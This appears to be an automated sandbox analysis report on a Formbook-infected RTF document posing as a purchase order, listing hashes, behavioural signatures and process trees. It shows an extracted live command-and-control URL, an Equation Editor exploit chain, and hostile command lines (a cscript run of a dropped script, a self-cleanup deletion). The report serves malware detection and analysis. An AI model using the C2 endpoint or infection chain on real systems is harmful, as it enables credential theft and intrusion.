Analysis
max time kernel: 147s
max time network: 141s
platform: windows7_x64
resource: win7v20201028
submitted: 18-01-2021 07:54
Static task
static1
Behavioral task
behavioral1
Sample
Order No.428 1-18-2021 BA URUS BINA (M) SDN BHD.doc.rtf
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Order No.428 1-18-2021 BA URUS BINA (M) SDN BHD.doc.rtf
Resource
win10v20201028
General
Target: Order No.428 1-18-2021 BA URUS BINA (M) SDN BHD.doc.rtf
Size: 1.5MB
MD5: 6afa446a78ee1e4003e2419c4b3ff648
SHA1: d8ab568179d3dae50e76e7ff0aa6ecb18da84377
SHA256: 052c6dd23430c3cb18615febd286a20e4fbfdcaa66f45d00b0f8fa1d1e70d92b
SHA512: 73b0d69a4a134ced282db75f0de06c426db87620bbddf8f030bd2658efe3cc5adf392a5a9ab9a3900b6820010eed2f6c227d2dd9e78121781e7967f3e6443ee2
Malware Config
Extracted
formbook
http://www.histasinsaat.com/lbn/
Signatures
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes: Powershell.exe
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1060 | 1592 | Powershell.exe |
Formbook Payload 3 IoCs
Processes:
resource | yara_rule
behavioral1/memory/1096-27-0x000000000041EC20-mapping.dmp | formbook
behavioral1/memory/1096-26-0x0000000000400000-0x000000000042E000-memory.dmp | formbook
behavioral1/memory/2004-37-0x0000000000080000-0x00000000000AE000-memory.dmp | formbook
Blocklisted process makes network request 4 IoCs
Processes: Powershell.exe
flow | pid | process
8 | 1060 | Powershell.exe
10 | 1060 | Powershell.exe
12 | 1060 | Powershell.exe
14 | 1060 | Powershell.exe
Drops file in System32 directory 1 IoCs
Processes: Powershell.exe
description | ioc | process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | Powershell.exe
Suspicious use of SetThreadContext 4 IoCs
Processes: Powershell.exe, control.exe, NAPSTAT.EXE
description | pid | process | target process
PID 1060 set thread context of 1096 | 1060 | Powershell.exe | control.exe
PID 1096 set thread context of 1276 | 1096 | control.exe | Explorer.EXE
PID 1096 set thread context of 1276 | 1096 | control.exe | Explorer.EXE
PID 2004 set thread context of 1276 | 2004 | NAPSTAT.EXE | Explorer.EXE
Drops file in Windows directory 1 IoCs
Processes: WINWORD.EXE
description | ioc | process
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
Modifies Internet Explorer settings
Processes: WINWORD.EXE
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | WINWORD.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | WINWORD.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes: WINWORD.EXE
pid | process
1732 | WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 34 IoCs
Processes:
Powershell.execontrol.exeNAPSTAT.EXEpid process 1060 Powershell.exe 1060 Powershell.exe 1060 Powershell.exe 1060 Powershell.exe 1060 Powershell.exe 1060 Powershell.exe 1060 Powershell.exe 1060 Powershell.exe 1096 control.exe 1096 control.exe 1096 control.exe 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE 2004 NAPSTAT.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes: Explorer.EXE
pid | process
1276 | Explorer.EXE
Suspicious behavior: MapViewOfSection 6 IoCs
Processes: control.exe, NAPSTAT.EXE
pid | process
1096 | control.exe
1096 | control.exe
1096 | control.exe
1096 | control.exe
2004 | NAPSTAT.EXE
2004 | NAPSTAT.EXE
Suspicious use of AdjustPrivilegeToken 49 IoCs
Processes: Powershell.exe, control.exe, NAPSTAT.EXE, Explorer.EXE
description | pid | process
Token: SeDebugPrivilege | 1060 | Powershell.exe
Token: SeIncreaseQuotaPrivilege | 1060 | Powershell.exe
Token: SeSecurityPrivilege | 1060 | Powershell.exe
Token: SeTakeOwnershipPrivilege | 1060 | Powershell.exe
Token: SeLoadDriverPrivilege | 1060 | Powershell.exe
Token: SeSystemProfilePrivilege | 1060 | Powershell.exe
Token: SeSystemtimePrivilege | 1060 | Powershell.exe
Token: SeProfSingleProcessPrivilege | 1060 | Powershell.exe
Token: SeIncBasePriorityPrivilege | 1060 | Powershell.exe
Token: SeCreatePagefilePrivilege | 1060 | Powershell.exe
Token: SeBackupPrivilege | 1060 | Powershell.exe
Token: SeRestorePrivilege | 1060 | Powershell.exe
Token: SeShutdownPrivilege | 1060 | Powershell.exe
Token: SeDebugPrivilege | 1060 | Powershell.exe
Token: SeSystemEnvironmentPrivilege | 1060 | Powershell.exe
Token: SeRemoteShutdownPrivilege | 1060 | Powershell.exe
Token: SeUndockPrivilege | 1060 | Powershell.exe
Token: SeManageVolumePrivilege | 1060 | Powershell.exe
Token: 33 | 1060 | Powershell.exe
Token: 34 | 1060 | Powershell.exe
Token: 35 | 1060 | Powershell.exe
Token: SeIncreaseQuotaPrivilege | 1060 | Powershell.exe
Token: SeSecurityPrivilege | 1060 | Powershell.exe
Token: SeTakeOwnershipPrivilege | 1060 | Powershell.exe
Token: SeLoadDriverPrivilege | 1060 | Powershell.exe
Token: SeSystemProfilePrivilege | 1060 | Powershell.exe
Token: SeSystemtimePrivilege | 1060 | Powershell.exe
Token: SeProfSingleProcessPrivilege | 1060 | Powershell.exe
Token: SeIncBasePriorityPrivilege | 1060 | Powershell.exe
Token: SeCreatePagefilePrivilege | 1060 | Powershell.exe
Token: SeBackupPrivilege | 1060 | Powershell.exe
Token: SeRestorePrivilege | 1060 | Powershell.exe
Token: SeShutdownPrivilege | 1060 | Powershell.exe
Token: SeDebugPrivilege | 1060 | Powershell.exe
Token: SeSystemEnvironmentPrivilege | 1060 | Powershell.exe
Token: SeRemoteShutdownPrivilege | 1060 | Powershell.exe
Token: SeUndockPrivilege | 1060 | Powershell.exe
Token: SeManageVolumePrivilege | 1060 | Powershell.exe
Token: 33 | 1060 | Powershell.exe
Token: 34 | 1060 | Powershell.exe
Token: 35 | 1060 | Powershell.exe
Token: SeDebugPrivilege | 1096 | control.exe
Token: SeDebugPrivilege | 2004 | NAPSTAT.EXE
Token: SeShutdownPrivilege | 1276 | Explorer.EXE
Token: SeShutdownPrivilege | 1276 | Explorer.EXE
Token: SeShutdownPrivilege | 1276 | Explorer.EXE
Token: SeShutdownPrivilege | 1276 | Explorer.EXE
Token: SeShutdownPrivilege | 1276 | Explorer.EXE
Token: SeShutdownPrivilege | 1276 | Explorer.EXE
Suspicious use of FindShellTrayWindow 6 IoCs
Processes: Explorer.EXE
pid | process
1276 | Explorer.EXE
1276 | Explorer.EXE
1276 | Explorer.EXE
1276 | Explorer.EXE
1276 | Explorer.EXE
1276 | Explorer.EXE
Suspicious use of SendNotifyMessage 6 IoCs
Processes: Explorer.EXE
pid | process
1276 | Explorer.EXE
1276 | Explorer.EXE
1276 | Explorer.EXE
1276 | Explorer.EXE
1276 | Explorer.EXE
1276 | Explorer.EXE
Suspicious use of SetWindowsHookEx 2 IoCs
Processes: WINWORD.EXE
pid | process
1732 | WINWORD.EXE
1732 | WINWORD.EXE
Suspicious use of WriteProcessMemory 27 IoCs
Processes: EQNEDT32.EXE, CmD.exe, WINWORD.EXE, Powershell.exe, Explorer.EXE, NAPSTAT.EXE
description | pid | process | target process
PID 2036 wrote to memory of 1888 | 2036 | EQNEDT32.EXE | CmD.exe
PID 2036 wrote to memory of 1888 | 2036 | EQNEDT32.EXE | CmD.exe
PID 2036 wrote to memory of 1888 | 2036 | EQNEDT32.EXE | CmD.exe
PID 2036 wrote to memory of 1888 | 2036 | EQNEDT32.EXE | CmD.exe
PID 1888 wrote to memory of 1748 | 1888 | CmD.exe | cscript.exe
PID 1888 wrote to memory of 1748 | 1888 | CmD.exe | cscript.exe
PID 1888 wrote to memory of 1748 | 1888 | CmD.exe | cscript.exe
PID 1888 wrote to memory of 1748 | 1888 | CmD.exe | cscript.exe
PID 1732 wrote to memory of 1716 | 1732 | WINWORD.EXE | splwow64.exe
PID 1732 wrote to memory of 1716 | 1732 | WINWORD.EXE | splwow64.exe
PID 1732 wrote to memory of 1716 | 1732 | WINWORD.EXE | splwow64.exe
PID 1732 wrote to memory of 1716 | 1732 | WINWORD.EXE | splwow64.exe
PID 1060 wrote to memory of 1096 | 1060 | Powershell.exe | control.exe
PID 1060 wrote to memory of 1096 | 1060 | Powershell.exe | control.exe
PID 1060 wrote to memory of 1096 | 1060 | Powershell.exe | control.exe
PID 1060 wrote to memory of 1096 | 1060 | Powershell.exe | control.exe
PID 1060 wrote to memory of 1096 | 1060 | Powershell.exe | control.exe
PID 1060 wrote to memory of 1096 | 1060 | Powershell.exe | control.exe
PID 1060 wrote to memory of 1096 | 1060 | Powershell.exe | control.exe
PID 1276 wrote to memory of 2004 | 1276 | Explorer.EXE | NAPSTAT.EXE
PID 1276 wrote to memory of 2004 | 1276 | Explorer.EXE | NAPSTAT.EXE
PID 1276 wrote to memory of 2004 | 1276 | Explorer.EXE | NAPSTAT.EXE
PID 1276 wrote to memory of 2004 | 1276 | Explorer.EXE | NAPSTAT.EXE
PID 2004 wrote to memory of 528 | 2004 | NAPSTAT.EXE | cmd.exe
PID 2004 wrote to memory of 528 | 2004 | NAPSTAT.EXE | cmd.exe
PID 2004 wrote to memory of 528 | 2004 | NAPSTAT.EXE | cmd.exe
PID 2004 wrote to memory of 528 | 2004 | NAPSTAT.EXE | cmd.exe
Processes
C:\Windows\Explorer.EXE
Command line: C:\Windows\Explorer.EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
  C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Order No.428 1-18-2021 BA URUS BINA (M) SDN BHD.doc.rtf"
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
    C:\Windows\splwow64.exe
    Command line: C:\Windows\splwow64.exe 12288
  C:\Windows\SysWOW64\NAPSTAT.EXE
  Command line: "C:\Windows\SysWOW64\NAPSTAT.EXE"
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe
    Command line: /c del "C:\WINDOWS\syswow64\control.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\CmD.exe
  Command line: CmD.exe /C cscript %tmp%\Client.vbs AC
  - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cscript.exe
    Command line: cscript C:\Users\Admin\AppData\Local\Temp\Client.vbs AC
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
  C:\WINDOWS\syswow64\control.exe
  Command line: "{path}"
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
Downloads
C:\Users\Admin\AppData\Local\Temp\Client.vbs
MD5: 1d90a2e70435572f9f4b6468f2ca12b0
SHA1: af9b2d007aa2ae788eaba3cb4bc9bce7b05142f5
SHA256: afb05ff8d35a39d5358bb58cedc47ebb3e487141fab9b7ec360cf65da5c9231d
SHA512: 148700cb7ab7f1c428159df1cf0ad37567e7a28743221e1ffdfb8ec52b52fb7361fae62c1d9629e81cd8b87d022b1960bd391bbd228b71856e0e184fc4564fa4